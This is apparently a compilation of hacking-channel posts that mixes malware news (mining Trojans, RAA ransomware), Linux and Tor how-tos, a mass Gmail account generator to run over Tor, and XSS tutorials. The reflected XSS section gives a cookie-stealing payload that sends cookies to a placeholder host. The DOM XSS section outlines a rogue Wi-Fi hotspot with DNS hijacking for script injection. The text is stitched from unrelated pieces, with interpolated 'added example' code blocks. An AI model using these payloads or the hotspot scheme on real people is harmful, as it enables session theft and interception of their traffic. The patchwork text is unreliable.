UNDERCODE SECURITY
🦑 WELCOME TO UNDERCODE TESTING: LEARN HACKING | PROGRAMMING | SECURITY & more.

THIS CHANNEL IS BY:

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOS)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Forwarded from WEB UNDERCODE - PRIVATE
🦑 RANDOM HELPFUL WRITTEN TUTORIALS
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ThanatosMiner: a mining Trojan spread through attacks on the high-risk BlueKeep vulnerability
#News

> The ThanatosMiner mining Trojan exploits the BlueKeep vulnerability CVE-2019-0708 to spread. The attacker packaged the public Python version of the BlueKeep exploit code into scan.exe, which scans a large range of randomly generated IP addresses to detect and attack vulnerable hosts.

> After the vulnerability is successfully exploited, the shellcode executes to download the Trojan svchost.exe, written in C#, which is then used to download the Monero mining Trojan and the attack modules for the next round of attacks. Because the assembly name of the payload program is ThanatosCrypt, the mining Trojan was named ThanatosMiner (Death Miner).

> On May 15, 2019, Microsoft released a security update for CVE-2019-0708, a critical remote code execution vulnerability in Remote Desktop Services that affects some older versions of Windows. Once an attacker successfully triggers the vulnerability, they can execute arbitrary code on the target system. Triggering it requires no user interaction, meaning a vulnerable computer only needs to be connected to the Internet to be attacked and compromised, without anyone operating it. The BlueKeep vulnerability (CVE-2019-0708) is a high-risk vulnerability that all security vendors take very seriously.

> The vulnerability affects older versions of Windows, including Windows 7, Windows Server 2008 R2, Windows Server 2008, Windows 2003 and Windows XP. Windows 8, Windows 10 and later versions are not affected by this vulnerability.

written by undercode

🦑 FOR BEGINNERS: GNU AND WINDOWS

> To build programs with the GNU toolchain on Windows, two projects are commonly used: Cygwin and MinGW + MSYS. They have similar goals but different implementation details. Let's figure it out.

🦑 Cygwin

1) Cygwin is the most complete implementation of the GNU environment for Windows. It provides most of the POSIX API as a library, which allows you to build programs from UNIX without porting, unless they require UNIX semantics. A striking example is daemons: they need fork() and signals, which Windows does not have, and Windows services work completely differently.

2) In addition to the library, the distribution contains a set of classic UNIX commands and a terminal. The command implementations use this library and support some UNIX features, such as case-sensitive file names.

3) Intended use: if there is no desire or ability to port the program to Windows, or to use only platform-independent APIs, it can be built "under Cygwin", at the cost of a dependency on cygwin1.dll and relative isolation from the rest of the system.

4) Many people have installed, and continue to install, the Cygwin environment to be able to use classic UNIX commands on Windows. Some developers also include Cygwin in their instructions for building their Windows programs, although the program itself does not link against cygwin1.dll. It may be more correct to use MSYS for this purpose.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking

🦑 NEW DEEP DANGEROUS WEBSITES (Non-English), 7/24 & 24/24 ALIVE


🦑 VPS & LEAK .ONION, 7/24 & 24/24 ALIVE
https://www.torproject.org/


🦑 HOW TO INSTALL TOR IN KALI IN 2 STEPS:

How To Install Tor Browser In Kali Linux Using Apt
Open a terminal window

1) Run apt-get update

2) Run apt-get install tor torbrowser-launcher and select Y at the prompt

3) Now you’ll have a new Tor Browser application in the Applications menu under Usual Applications and Internet.

> This shortcut will only work if you’re not running as the root user.

🦑 Be wary of the BasedMiner mining Trojan, which brute-forces weak SQL passwords to break in and mine:
#News

> The mining Trojan gang mainly targets MS SQL services with weak-password brute-force attacks. After a successful break-in, it downloads the Gh0st remote-control Trojan to take control of the system. It also uses multiple Windows vulnerabilities to escalate privileges and obtain the highest system privileges, then implants a Monero mining Trojan, which has been mining and has made a profit of 8,000 yuan.

> Because its remote-control module is named based.dll, Tencent Security Center named it BasedMiner. After a BasedMiner intrusion, the remote-control Trojan is implanted on the enterprise server, which may lead to the leakage of the victim enterprise's confidential information.

> While mining, the server's resources are heavily consumed, which affects normal business operations. Tencent security experts recommend that companies check for and correct the use of weak passwords for logging in to servers, patch security vulnerabilities on the servers, and so avoid intrusion by mining gangs.


🦑 How to synchronize local and remote directories in Linux using Lsyncd

Installing Lsyncd


1️⃣ On Debian and its derivatives, such as Ubuntu and Linux Mint, run the following command to install Lsyncd:

> sudo apt-get install lsyncd


2️⃣ On RHEL and CentOS, you need to enable the EPEL repository first.

a) sudo yum install epel-release


b) Then install Lsyncd with the command:

> sudo yum install lsyncd

> Lsyncd configuration on Debian, Ubuntu and derivatives

> Lsyncd does not provide a default configuration file on DEB based systems.

c) We need to create it manually. However, Lsyncd includes some sample configuration files that are useful to get a general idea of how to do synchronization. The example configuration files are found under the directory “/usr/share/doc/lsyncd-*/examples”.

> ls /usr/share/doc/lsyncd/examples/

d) Output example:

lbash.lua lgforce.lua lpostcmd.lua lrsyncssh.lua
lecho.lua limagemagic.lua lrsync.lua

e) As you can see in the above output, each config file has a .lua extension. This is because the lsyncd configuration file is written in the Lua programming language. Let's take a look at a sample configuration file.

> cat /usr/share/doc/lsyncd/examples/lrsync.lua


f) The lrsync.lua configuration file looks like this:

----
-- User configuration file for lsyncd.
--
-- Simple example for default rsync.
--
-- Note: 'settings = { ... }' is the lsyncd 2.0 form shipped with this
-- sample; lsyncd 2.1 and later expect the function-call form settings { ... }.
settings = {
    statusFile = "/tmp/lsyncd.stat",  -- where lsyncd writes its status report
    statusInterval = 1,               -- seconds between status file updates
}

sync {
    default.rsync,   -- use plain rsync to a local target directory
    source = "src",  -- directory to watch (relative to the working directory)
    target = "trg",  -- directory to keep in sync with it
}
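The sample above only mirrors one local directory into another. As an added example (not one of lsyncd's shipped files), here is the remote case the post's title asks for: pushing a local web root to another host over SSH with rsync. The paths, user, host name and excludes are assumptions for illustration, not values from the post.

```lua
----
-- Added example configuration (not from lsyncd or the original post):
-- watch a local directory and push changes to a remote host over SSH.
-- Uses the lsyncd 2.1+ function-call form of settings.
settings {
    logfile        = "/var/log/lsyncd/lsyncd.log",     -- assumed log path
    statusFile     = "/var/log/lsyncd/lsyncd.status",  -- assumed status path
    statusInterval = 20,    -- refresh the status file every 20 seconds
    insist         = true,  -- keep running even if the remote is down at startup
}

sync {
    default.rsyncssh,                          -- rsync over ssh; moves become remote renames
    source    = "/var/www/html",               -- local directory to watch (assumed)
    host      = "deploy@backup.example.com",   -- remote login (assumed placeholder host)
    targetdir = "/srv/backup/www",             -- remote directory (assumed)
    delay     = 15,                            -- batch filesystem events for 15 s
    -- Do not ship scratch files, the VCS directory or credentials to the backup host.
    exclude   = { "*.tmp", "*.swp", ".git/", "config/secrets.php" },
    rsync     = {
        archive  = true,   -- preserve permissions, ownership and timestamps
        compress = true,   -- compress data in transit
        verbose  = true,   -- log each transferred file
    },
}
```

Start it with `sudo lsyncd /etc/lsyncd/lsyncd.conf.lua` (the file name is your choice) and watch the status file to confirm the first full sync completed; the `deploy` user needs key-based SSH access to the remote host for unattended operation.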

enjoy ❤️👍🏿

🦑 GENERATE UNLIMITED GMAILS:

1️⃣DOWNLOAD :

> https://pypi.org/search/?c=Environment+%3A%3A+Win32+%28MS+Windows%29
(WIN)

> https://pypi.org/project/PyAutoGUI/ (for linux)

1) $ sudo apt-get install python-virtualenv

2) $ virtualenv --no-site-packages ~/venv

3) $ source ~/venv/bin/activate

4) $ mkdir -p ~/PIL ~/temp/site-packages

5) $ export PYTHONPATH=~/temp/site-packages/

6) $ cd ~/PIL

7) $ wget http://effbot.org/downloads/Imaging-1.1.7.tar.gz

8) $ sudo apt-get build-dep python-imaging
# sets up zlib1g-dev, libfreetype6-dev, libjpeg62-dev, liblcms1-dev, ...

9) $ easy_install -v --install-dir ~/temp/site-packages --find-links ~/PIL\
--allow-hosts=None --always-unzip Imaging

2️⃣ Get the Firefox browser: https://www.mozilla.org/sp/firefox/new/

3️⃣git clone https://github.com/unix121/gmail-generator.git

4️⃣cd gmail-generator


5️⃣python3 gmail_generator.py

(use tor server)
6️⃣checkout the video tutorial after this post


🦑 HOW TO CHECK IF YOUR WEBSITE IS HACKED, FOR BEGINNERS:

1. A hacked website shows a telltale pattern in its data: the number of indexed pages and the traffic from search engines increase dramatically in a short period. Webmasters can therefore use the indexing tool of the Baidu webmaster platform to watch for abnormal growth in the site's indexed pages; if there is a sudden increase, use the traffic and keyword tool to check whether the keywords bringing the traffic are related to the website, or whether they involve gambling and pornography.

2. Querying the site with the site: search operator, combined with common pornography and gambling keywords, works better and can surface illegal pages that do not belong to the site.

3. Because Baidu brings huge traffic, some hacks redirect only the visitors coming from Baidu, which is hard for the webmaster to notice. So when checking whether your site is hacked, click through to the site's pages from the Baidu search results and see whether you are redirected to other sites.

4. The site's content is flagged as risky in the search results.

*Subsequently, you can ask the website's technical staff to further confirm whether the website is hacked through backend data and programs.



🦑 After confirming that the website is hacked, in addition to prompting technical staff to make quick fixes, SEO staff also need to do some follow-up and preventive work.

1. Stop the website service immediately, to prevent users from continuing to be affected and to prevent other sites from being affected (returning a 503 status code is recommended).

2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge them to respond.

3. Clean up the discovered hacked content, set the hacked pages to return 404 (dead links), and submit them through the dead-link submission tool of the Baidu webmaster platform.

4. Work out the likely time of the compromise, compare it with the file modification times on the server, and deal with the files uploaded or modified by the attackers; check the user management settings on the server for abnormal changes; change the server's user access passwords. Note: you can determine the likely time of the compromise from the access log, but attackers may also modify the server's access log.

5. Do a good job on security: check the website for vulnerabilities and prevent it from being hacked again.



🦑 A ransomware program called RAA has recently appeared; it is written entirely in JavaScript and locks users' files using strong encryption.

HOW IT WORKS

> Most malware in Windows is written in a compiled language such as C or C++, and is distributed in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch and PowerShell.

> Client-side malware is rarely written in web-related languages such as JavaScript, which is mainly interpreted by the browser. But the built-in Windows Script Host can also execute .js files directly.

> Attackers have only recently started using this technique. Last month, Microsoft warned that .js attachments in malicious emails may carry viruses, and ESET's security research lab also warned that certain .js attachments may carry the Locky ransomware. But in both cases the JavaScript files are used as a downloader: they fetch traditional malware written in other languages from other addresses and install it. RAA is different; it is malware written entirely in JavaScript.

> Experts at the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a JavaScript cryptography library, to implement its encryption. The implementation of the encryption is very solid, using the AES-256 algorithm.

> Once a file is encrypted, RAA appends .locked to the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar and .csv.

> Lawrence Abrams, the founder of BleepingComputer.com, said in a blog post: "Under the current circumstances, there is no way to decrypt except payment."

> According to user reports, after infection with RAA, messages in Russian are displayed; but even if it currently targets Russian computers, its spread elsewhere is only a matter of time.

> It is not normal for emails to include JavaScript attachments, so users are advised to avoid opening such files, even when they are inside .zip archives. .js files are rarely used anywhere except on websites and in browsers.


🦑 Reflected XSS: ALL YOU NEED TO KNOW:

A reflected XSS attack relies on the site's server echoing back a script supplied in the request, which is then executed on the client to carry out a web attack.

example:

1) Suppose that when you search for books on Amazon, the submitted search term is displayed if no books are found.

2) Type "<script>alert('handsome boy')</script>" into the search box and click search.

3) The page does not filter the returned data and displays it directly, so the alert dialog pops up.

4) Then you can construct an address that obtains the user's cookies and get others to click it through QQ groups or spam:

> http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>
PS: Of course, this address is invalid; it's just an example.

🦑 In conclusion:

If you only succeed in steps 1, 2, and 3, you are just tossing yourself. If you succeed in step 4, it is a decent XSS attack.

Defensive measures for developers:

1) When the front end displays server data, not only tag content needs to be filtered and escaped; attribute values may need it too.

2) When the backend receives a request, it checks whether the request is an attack request and blocks the attack.

E.g.:

Tag content:

<span><script>alert('handsome boy')</script></span>

Escaped:

<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt;</span>

> Attributes:

3) If the value attribute of an input contains

> onclick="javascript:alert('handsome boy')

the rendered markup may become:

<input type="text" value="..." onclick="javascript:alert('handsome boy')">

4) Clicking the input causes the attack script to execute. The fix is to filter the script or escape the double quotes.
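The two defensive points above (escape tag content, and escape attribute values too) in working code. This is an added example, not code from the original post or from Amazon; the function names and the search-page template are my own, while the two payloads are the ones the post uses. It runs under Node.js with no browser.

```javascript
// Added example (not from the original post): output encoding for the two
// contexts the tutorial shows, HTML text content and a double-quoted attribute.
// Function names and the page template are assumptions; the payloads are the post's.

// Escape the five characters that can change meaning in HTML text or inside a
// double-quoted attribute value. '&' must be replaced first or it double-encodes.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The tutorial's two inputs: one targets tag content, the other breaks out of
// the value="..." attribute by closing the quote early.
const TAG_PAYLOAD = "<script>alert('handsome boy')</script>";
const ATTRIBUTE_PAYLOAD = "\" onclick=\"javascript:alert('handsome boy')";

// Vulnerable rendering: the search term is concatenated into the markup as-is,
// the "page does not filter the returned data" case from step 3.
function renderSearchPageUnsafe(term) {
  return `<span>No books found for: ${term}</span>` +
         `<input type="text" value="${term}">`;
}

// Hardened rendering: same template, but every interpolation point is escaped.
// This is only sufficient because the attribute is double-quoted; an unquoted
// attribute would still need a stricter allow-list.
function renderSearchPageSafe(term) {
  const safe = escapeHtml(term);
  return `<span>No books found for: ${safe}</span>` +
         `<input type="text" value="${safe}">`;
}

// Rough check for the two injection shapes in this tutorial: a live <script>
// tag, or a closing quote followed by an on* event-handler attribute.
// A demo heuristic, not a substitute for a real HTML parser.
function containsInjection(html) {
  return /<script\b/i.test(html) || /"\s+on[a-z]+\s*=/i.test(html);
}

// Runs both payloads through both renderers and reports what survived.
function demo() {
  return {
    unsafeTag:  containsInjection(renderSearchPageUnsafe(TAG_PAYLOAD)),       // true
    safeTag:    containsInjection(renderSearchPageSafe(TAG_PAYLOAD)),         // false
    unsafeAttr: containsInjection(renderSearchPageUnsafe(ATTRIBUTE_PAYLOAD)), // true
    safeAttr:   containsInjection(renderSearchPageSafe(ATTRIBUTE_PAYLOAD)),   // false
  };
}
```

Escaping on output is the front-end half of the advice; the backend check in point 2 is a second layer, not a replacement, because a filter that misses one encoding still leaves the unescaped template exploitable.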


🦑 DOM-based or local XSS tutorial

DOM-based or local XSS attacks. Typically, a free Wi-Fi hotspot is offered, but the gateway providing it inserts a script into every page you visit, or directly returns a phishing page, thereby implanting malicious scripts. A script that exists directly on the page without coming back through the site's server is a local XSS attack.

Example 1:

1. Provide a free Wi-Fi hotspot.

2. Start a special DNS service that resolves all domain names to our computer, and set the Wi-Fi DHCP DNS option to our computer's IP.

3. After a user connected to the Wi-Fi opens any website, the request is intercepted by us. We forward it to the real server according to the Host field in the HTTP header.

4. After receiving the data returned by the server, we can inject the web script and return it to the user.

5. When the injected script executes, the user's browser preloads the common script libraries of major websites in turn.
